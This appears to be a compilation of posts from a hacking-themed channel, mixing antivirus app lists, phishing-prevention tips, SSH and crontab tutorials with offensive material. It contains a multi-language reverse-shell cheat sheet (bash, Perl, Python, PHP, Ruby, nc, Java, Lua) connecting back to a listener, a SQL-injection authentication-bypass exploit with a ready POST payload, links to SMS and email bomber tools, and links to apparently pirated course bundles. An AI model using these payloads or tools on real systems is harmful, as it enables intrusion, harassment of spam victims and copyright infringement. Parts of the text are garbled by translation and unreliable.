▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST ANDROID ANTIVIRUS 2020 :
RECOMMENDED

https://play.google.com/store/apps/details?id=com.wsandroid.suite

https://play.google.com/store/apps/details?id=com.sophos.smsec

https://play.google.com/store/apps/details?id=com.ahnlab.v3mobilesecurity.soda&hl=en_GB

https://play.google.com/store/apps/details?id=com.avira.android&hl=en_GB

https://play.google.com/store/apps/details?id=com.bitdefender.antivirus&adobe_mc=MCMID%3D41657809592592441272502762824585041301%7CMCORGID%3D0E920C0F53DA9E9B0A490D45%2540AdobeOrg%7CTS%3D1600420351

https://play.google.com/store/apps/details?id=com.eset.ems2.gp&referrer=utm_source%3Deset.com%26utm_medium%3Dreferral%26utm_campaign%3Dglobal-web-download

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Reverse shell method for multiple programming languages ​​under Linux:

Bash command: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Perl version: perl -e'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p ,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i" );};

Python version: python -c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s. fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i "]);'

PHP version: php -r'$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby version: ruby ​​-rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d" ,f,f,f)'

nc version: nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp /f
nc xxxx 8888|/bin/sh|nc xxxx 9999

java version: r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Lua version: lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/ bin/sh -i <&3 >&3 2>&3');"

use for learn
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑lastest 2020 Daily Tracker System 1.0 -
Authentication Bypass
#Exploit

CVE ID: CVE-2020-24193
Date: September 2, 2020


# Vulnerable Source Code

if(isset($_POST['login']))
{
$email=$_POST['email'];
$password=md5($_POST['password']);
$query=mysqli_query($con,"select ID from tbluser where Email='$email' && Password='$password ' ");
$ret=mysqli_fetch_array($query);
if($ret>0){
$_SESSION['detsuid']=$ret['ID'];
header('location:dashboard.php');
}
else{
$msg="Invalid Details.";
}
}
?>


# Malicious POST Request to https://TARGET/dets/index.php HTTP/1.1
POST /dets/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.65.130/dets/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
DNT: 1
Connection: close
Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s
Upgrade-Insecure-Requests: 1

email='+or+1%3d1+--+hyd3sec&password=badPass&login=login

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

OWASP definition: Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user-supplied input and uses it to retrieve an object without performing sufficient authorization checks.
The Application uses untested data in a SQL call that is accessing account information.
Let consider a scenario where a web application allows the login user to change his secret value.
Here you can see the secret value must be referring to some user account of the database.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 bulk mail:

F E A T U R E S :

Active on Slack. Join the bulk-mail-cli Slack group for suggestions, bugs reports, support, and core development.

Shoot mails using CSV.

Mail dynamic HTML Templates using the {{fname|lname}} syntax.

Set the sending interval time in Cron Expressions! Eg. */10 * * * * *

Unlimited attachments! Attach any files on your local computer or you may just provide a direct URL in configuration and bulk-mail-cli will download and send the attachment under dynamic filenames and pathnames.

Runs on cloud! Can be run on AWS EC2 servers and on any Node.js droplet on DigitalOcean.

It saves your campaign progress! You can pause and resume the Mail Campaign from where you left the last time.

Use .env variables to not hardcode the emails and passwords in configuration files.

Contentful demo files provided! You get many beautiful email templates to pick from!

WordPress and other CMS' friendly. Just export the list of your users, change the email containing column name to email and you are good to go!

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/adventmail/bulk-mail-cli.git

2) bulk-mail-cli

3) Install bulk-mail-cli
Assuming that you have node and npm installed... Run the following in your terminal.

> npm i -g bulk-mail-cli

4) Just run bulkmail support in your terminal to see what commands and flags you can use to do awesome things.

5) To generate demo files, use the following command.

> bulkmail demo

6) Send the Mail
EMAIL="chandlerbing@friends.com" PASSWORD="secret" bulkmail -f bulkmail.json # reference the configuration file here (https://github.com/adventmail/bulk-mail-cli)

7) That will start the mailing process! After every mail it sends, it updates the configuration file with the emails that you sent the message to. So that when you run the same campaign next time, it will resume from where you paused. To start over, you can append the --restart flag to the command.

8) Dynamic data
You may add any other column featuring custom data in the CSV. Namely fname, lname, address, etc... to use in the Subject and Body of your campaign mail. You can use the CSV fields everywhere in the configuration files.

9) Syntax
The syntax can be used in the email section of the CSV and can also be used everywhere in the configuration file and HTML templates. The syntax will be processed by bulk-mail-cli to generate correct mail output.

{{Hi|Hello|Howdy}} 🙌

My name is {{fname}} {{lname}}.

How'yooou dooooing? 😁


more info on https://github.com/adventmail/bulk-mail-cli
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Chase Reiner - SEO Nexus Bundle 14,58

https://mega.nz/folder/hYsXUSDC#9gzYg5yULIiNhtFHXtRaKA

Detailed fresh Proxies List

https://pastebin.com/ebc3edKG

Guys, since offensive remove wifi driver from kali 2020 ISO, some hackers & beginners use the old Kali versions such 2019 & this totally wrong !!
Kali 2019 include many Cve & bugs, any Kali 2019 is vulnerable to many exploits & totally not safe, so undercode recommend you always update your Linux Os, what ever is Parrot, Kali, Aubergine ...


> apt upgrade isn’t the solution

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Here we list a few tips for preventing phishing scams, I hope this helps you:

1) Protect your computer with security software

Basically, we need antivirus software for many reasons, right? Special signatures, which are squarely embedded in computer antivirus code, protect against recognized technology workarounds and loopholes. You just need to keep the software updated automatically so that it can deal with any new security threats.

2) Beware of what you press

It is ok to click on links once you are on trusted sites. However, following links that seem random in emails and instant messages isn't all that smart. Hover over links that you are simply not sure about before clicking on them.

3) . Please check the security of the site

It's natural to be a little bit careful about sensitive information about activities, such as personal and financial data on the Internet. However, as long as you are on a secure website, there is nothing to worry about. Before submitting any data, make sure that the site URL starts with “https” and that there is a closed padlock next to the address bar.

Also check for a site security certificate (SSL) . If you receive a message that a particular website may contain malicious files, do not open it, never transfer files from suspicious emails or websites. Even search engines can show confident links that can lead users to a phishing web page offering a low-priced product. If a user makes purchases on such a website, the MasterCard data will be available to cybercriminals.

4) Never share your personal data

In general, you should never share personal or financially sensitive information over the network. once you are unsure, go to the very website of the company in question, get their variety and provide them with a solution.

Most phishing emails can direct you to pages where records are required to receive money or personal information of a square measure. A web user should never create confidential records from links contained in emails, never send an email to anyone with confidential information. Make it a habit to check the website address. A secure website always starts with “https”.

5) Always use firewalls

Last but not least, where high quality firewalls act as buffers between you, your desktop, and external attackers, you should be using 2 completely different types: desktop firewall and network firewall. The primary capability can be a kind of package, and therefore the second capability can be a kind of hardware. Once used, they drastically reduce the likelihood of hackers and phishers infiltrating your desktop or your network.

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A simple way for others to prompt for an empty number when they call your phone :


> When you don't want to be annoyed by others and are embarrassed to turn off the phone, it is a good idea to let others call your phone to prompt an empty number. Here is a way to make your mobile phone become an empty number at any time. It is very simple~~ Friends in need can make a note...
　　
> Enter **21*999999# in the standby mode and press the dial button~ OK ! ~ done
　　
> in this state, someone hit you over the phone number is empty and you will not receive phone
　　
> preliminary judging most phones can
　　
> Note: Since there is no test for all models, we can not guarantee success rate
　　
> in this state, even if to remind shutdown Power also will not cancel
　
> the code number to cancel the empty state is the same as above ## 21 # enter the
　　
> last remind remember to finish off state so as not to cause delay in releasing the empty No.
　　
> this principle probably use call forwarding to achieve, but do not answer incoming calls There is no charge if you pass, so this method will not waste your phone bill...

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

SuperTrades Bootcamp

https://mega.nz/folder/5eBgTADI#f7v5tmEz1GigEMjHhB0dGw

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to Enable SSH on Ubuntu :

1) Process for Enabling SSH
You can successfully enable and run the SSH protocol on your server by undergoing these four primary steps. These steps can assist you in effectively utilizing the network protocol of SSH on ubuntu 20.04.

Step 1 is the installation of SSH

Step 2 is enabling SHH

Step 3 is checking the status

Step 4 is connecting with firewall port

2) Installation of SSH
For installing, just run two additional commands for updating and up-gradation and then run the third sudo command to install the SSH on your server finally. The commands are as follows;

$ sudo apt update


$ sudo apt upgrade


$ sudo apt install openssh-server

3) You can also use install shh instead of openssh in the command as both will allow you to download the open package of SHH protocol. Type your password and continue the installation.

4) Enabling SSH
Now simply enable the network protocol in your operating system with the help of the following command;

$ sudo systemctl enable --now ssh

5) That’s all, and you have enabled the protocol for encrypted network on your system successfully.

Check Status

6) Now simply check the status of your protocol. Checking status also involves the command for stopping, reloading, and restarting the protocol. Use the following controls if you want to check the status.

$ systemctl status ssh.service

7) You can modify the status checking if you replace the status with other commands encompassing the reload, restart, and stop commands.

8) Connect with Firewall Port
It’s recommended connecting the server with port 22 if your firewall is active, also ensure that you are logged in the server of the protocol with the root user.

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

> > SHELLS FOR BEGINERS :

🦑What is Shellcode?

1) We know that shellcode has little to do with scripting for shells, so why the name? The relation with the shell is that shellcode was typically used specifically to open or 'pop' a shell – that is, an instance of a command line interpreter – so an attacker might use the shell as a means of manipulating the machine. Imagine that you could make a user enter an obviously harmless string into a legal program on their device that would magically open the computer to a reverse shell?

2) That's the last reward for pwning. Spawning a new process that will send a shell often requires very little javascript, so popping shells is a very lightweight, effective means of attack.

3) In order to achieve it, you’d need to find an exploitable program and fashion some malicious input string – the shellcode – containing small chunks of executable code to force the program into popping a shell. This is possible because for most programs, in order to be useful, they need the ability to receive input: to read strings and other data supplied by the user or piped in from another program.

4) Shellcode exploits this requirement by containing instructions telling the program to do something it otherwise wouldn’t or shouldn’t. Of course, almost no program is going to easily misinterpret data as code without a bit of persuasion, and the primary name of the game when it comes to persuading programs to engage in this kind of undefined behavior is another hacking conversation favorite: the buffer overflow.

🦑Controlling Code Execution

1) When we create a buffer overflow, the aim is to write a sufficiently large amount of data into the program’s memory so that two things happen. First, we fill up the allocated buffer, and second we supply enough extra data so that we overwrite the address that will be executed next with our own code.

2) This isn’t simple, but it might sound harder to do than it actually is. Because of the nature of how program memory is mapped out, when any function is called, there’s always a pointer held in memory to the address of the next function that should be executed after the currently executing one; this pointer is known as the Instruction Pointer, sometimes referred to as EIP (32 bit) or RIP (64 bit).

3) By reverse engineering a particular program and with a lot of fuzzing and experimenting, we can determine both whether a given program contains any functions that are vulnerable to a buffer overflow and, if so, the address of the Instruction Pointer when that vulnerable function has finished calling.

4) Knowing the offset – the memory address – of the Instruction Pointer at that point in code means we can determine precisely how much extra data we need to overflow the buffer and insert our own code at the address of the Instruction Pointer. When we do that, the program will try to execute the code at the address we’ve written to the RIP register. If that code is junk, like in the example above, the program will crash, but if it isn’t – if it’s a valid address, things start to get more interesting.

source: wiki
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST SPAMMERS EMAILS/SMS/MESSAGES..

https://github.com/TheSpeedX/TBomb

https://github.com/Juniorn1003/Email-Spammer

https://github.com/BlackXploits/email-spam

https://github.com/Curioo/emailpyspam

https://github.com/mohinparamasivam/Email-Bomber

https://github.com/RavicharanN/Spam-Whatsapp

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑MOST POPULAR CREDIT CARD MANAGER, TRUSTED APPS 2020 :

https://play.google.com/store/apps/details?id=net.thesimplest.creditcardmanager&utm_source=appgrooves&utm_medium=agp_ca9a9771141c52de8e4ccc1bf80b8f4c_net.thesimplest.creditcardmanager_us_others_16004994711195

https://play.google.com/store/apps/details?id=com.petalcard.petal&utm_source=appgrooves&utm_medium=agp_ca9a9771141c52de8e4ccc1bf80b8f4c_com.petalcard.petal_us_others_16004994753521

https://apps.apple.com/us/app/id1400353064?mt=8

https://apps.apple.com/us/app/id1428580080?mt=8

https://play.google.com/store/apps/details?id=com.ollocard.mobileapp&utm_source=appgrooves&utm_medium=agp_ca9a9771141c52de8e4ccc1bf80b8f4c_com.ollocard.mobileapp_us_others_16004994851710

https://apps.apple.com/us/app/id1427782837?mt=8

https://play.google.com/store/apps/details?id=com.creditonebank.mobile&utm_source=appgrooves&utm_medium=agp_ca9a9771141c52de8e4ccc1bf80b8f4c_com.creditonebank.mobile_us_others_16004994894729

https://apps.apple.com/us/app/id1128712763?mt=8

https://play.google.com/store/apps/details?id=com.firstpremier.mypremiercreditcard.app&utm_source=appgrooves&utm_medium=agp_ca9a9771141c52de8e4ccc1bf80b8f4c_com.firstpremier.mypremiercreditcard.app_us_others_16004994945189

https://apps.apple.com/us/app/id1476775662?mt=8

https://play.google.com/store/apps/details?id=com.discoverfinancial.mobile&utm_source=appgrooves&utm_medium=agp_ca9a9771141c52de8e4ccc1bf80b8f4c_com.discoverfinancial.mobile_us_others_16004994982236

https://apps.apple.com/us/app/id338010821?mt=8

https://play.google.com/store/apps/details?id=com.onlineceo.creditcardverifier&utm_source=appgrooves&utm_medium=agp_ca9a9771141c52de8e4ccc1bf80b8f4c_com.onlineceo.creditcardverifier_us_others_16004995052540

https://play.google.com/store/apps/details?id=com.debit_credit_card.creditcardmanager&utm_source=appgrooves&utm_medium=agp_ca9a9771141c52de8e4ccc1bf80b8f4c_com.debit_credit_card.creditcardmanager_us_others_16004995069099

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Pro Tips By undercode :
> Crontab Syntax and Statements


Crontab (cron table) is a text file that defines the schedule of cron jobs. Crontab files can be created, viewed, modified, and deleted using the crontab command.

Each line in the user's crontab contains six fields separated by a space, followed by the command to run:

* * * * * command (s)
^ ^ ^ ^ ^
| | | | | allowed values
| | | | | -------
| | | | ----- Day of week (0 - 7) (Sunday = 0 or 7)
| | | ------- Month (1 - 12)
| | --------- Day of month (1 - 31)
| ----------- Hour (0 - 23)
------------- Minute (0 - 59)

🦑The first five fields (time and date) also accept the following operators:

1) The asterisk operator means all valid values. If you have an asterisk in the Minute field, it means the task will run every minute.

2) The hyphen operator allows you to specify a range of values. If you set 1-5 in the Day of week field, the task will run every weekday (Monday through Friday). The range is inclusive, which means the first and last values ​​are included in the range.

3) The comma operator allows you to define a list of values ​​to repeat. For example, if you have 1, 3, 5 in the Hour field, the task will run at 1, 3, and 5 AM. The list can contain individual values ​​and ranges 1-5, 7, 8, 10-15

4-5) The forward slash operator lets you specify pitch values ​​that can be used in combination with ranges. For example, if you specified 1-10 / 2 in the Minute field, this means that the action will be performed every two minutes in the range 1 to 10, as if you specified 1, 3, 5, 7, 9. Instead of a range of values, you can also use the asterisk operator. You can use "* / 20" to specify a task to run every 20 minutes.

🦑The syntax for system-wide crontabs is slightly different from custom crontabs. It contains an additional required user field that specifies which user will run the cron job.

* * * * * <username> command (s)


1) To edit the crontab file or create one if it does not exist, use the crontab -e command.


2) Run cron job every 5 minutes
There are two ways to run a cron job every five minutes.

The first option is to use the comma operator to create a list of minutes:

0,5,10,15,20,25,30,35,40,45,50,55 * * * * command


The above line is syntactically correct and will work fine. However, entering the entire list can be tedious and error prone.

The second option to specify a job that will run every 5 minutes of the hour is to use the step statement:

* / 5 * * * * command


* / 5 means create a list of all minutes and run a job for every fifth value from the list.


@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁